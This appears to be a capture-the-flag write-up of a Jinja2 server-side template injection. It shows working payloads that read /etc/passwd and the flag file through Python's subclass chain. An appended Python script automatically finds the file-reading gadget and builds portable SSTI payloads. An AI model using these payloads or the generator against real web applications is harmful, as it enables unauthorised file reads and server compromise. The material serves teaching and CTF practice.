Viewing the page source I can see a reference to server.py, so I open it:
http://zumbo-8ac445b1.ctf.bsidessf.net/server.py
In it I found with open('/flag'), which means the goal is to find a way to reach the /flag file.
I also found a Jinja2 template injection. Just try:
http://zumbo-8ac445b1.ctf.bsidessf.net/index.template{{7*7}}
and you will see the expression evaluated in the response (7*7 renders as 49), so the template name is being rendered as template source.
Open Burp Suite and test.
First:
GET /index.template{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} HTTP/1.1
-> it will show the content of the passwd file, confirming arbitrary file read.
(Note: ''.__class__.__mro__[2] is object only on Python 2, where str's MRO is str, basestring, object, and index 40 happens to be the file class on this server's interpreter; the position shifts between Python versions and with which modules were imported, so on another target you would enumerate __subclasses__() again.)
Second try:
GET /index.template{{''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}} HTTP/1.1
-> TADA -> FLAG: RUNNER_ON_SECOND_BASE
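As an added example (not part of the original writeup or the challenge's code), the script below generalizes the payload above. Instead of hard-coding __mro__[2] and [40], it walks the subclass graph from object and finds a file-reading class by name (the builtin file on Python 2, _io.FileIO on Python 3, which sits two levels below object), then emits a Jinja2 expression of the same shape with the index chain it discovered. It reads a constructed temporary file standing in for /flag so it runs offline; the indices are only valid for the process that computed them, so against a real target you would first render {{''.__class__.__mro__[-1].__subclasses__()}} and pick indices from the list in the response.

```python
"""Added example: locate the file-read gadget for a Jinja2 SSTI payload
without hard-coding the subclass index.

The writeup's payload uses ''.__class__.__mro__[2].__subclasses__()[40]. Both
numbers are interpreter-specific: __mro__[2] is `object` only on Python 2
(str -> basestring -> object), and the position of the file class in
object.__subclasses__() shifts with the Python version and with which
modules were imported before the template was rendered.
"""
import os
import tempfile

# (module, class name) pairs that can open and read a file.
# Python 2 exposes the builtin `file`; Python 3 exposes _io.FileIO, which is
# not a direct subclass of object (object -> _IOBase -> _RawIOBase -> FileIO).
GADGETS = {("__builtin__", "file"), ("_io", "FileIO")}


def find_gadget(root=object, max_depth=4):
    """Depth-first search of the subclass graph below `root`.

    Returns (indices, cls): the list of __subclasses__() indices that leads
    from `root` to the first file-reading class found, and the class itself.
    """
    seen = set()

    def walk(cls, path, depth):
        if depth > max_depth or id(cls) in seen:
            return None
        seen.add(id(cls))
        try:
            # Call through `type` so that `type` itself (which is listed in
            # object.__subclasses__()) does not raise on a bare cls.__subclasses__().
            subs = type.__subclasses__(cls)
        except TypeError:
            return None
        for index, sub in enumerate(subs):
            if (sub.__module__, sub.__name__) in GADGETS:
                return path + [index], sub
            found = walk(sub, path + [index], depth + 1)
            if found is not None:
                return found
        return None

    result = walk(root, [], 0)
    if result is None:
        raise LookupError("no file gadget reachable from %r" % (root,))
    return result


def jinja_payload(path):
    """Build the template expression, same shape as the writeup's payload
    but with the index chain discovered for this interpreter."""
    indices, _ = find_gadget()
    chain = "".join(".__subclasses__()[%d]" % i for i in indices)
    return "{{''.__class__.__mro__[-1]%s('%s').read()}}" % (chain, path)


def read_via_gadget(path):
    """Read `path` using only the discovered class, as the payload would."""
    _, cls = find_gadget()
    fh = cls(path)                  # file(path) on Py2, FileIO(path) on Py3
    try:
        data = fh.read()
    finally:
        fh.close()
    return data.decode() if isinstance(data, bytes) else data


def demo():
    """Write a constructed stand-in for /flag (sample data, not the CTF flag),
    read it back through the gadget, and return (contents, payload)."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as out:
        out.write("FLAG{constructed_sample}\n")
    try:
        return read_via_gadget(path).strip(), jinja_payload(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    contents, payload = demo()
    print(contents)
    print(payload)
```

Run it under the same Python version as the target to see why the writeup's [40] is not portable: on Python 3 the path to FileIO is three indices deep, which is why most Python 3 SSTI payloads reach for a direct subclass of object (such as os._wrap_close and its __init__.__globals__) instead of a file class.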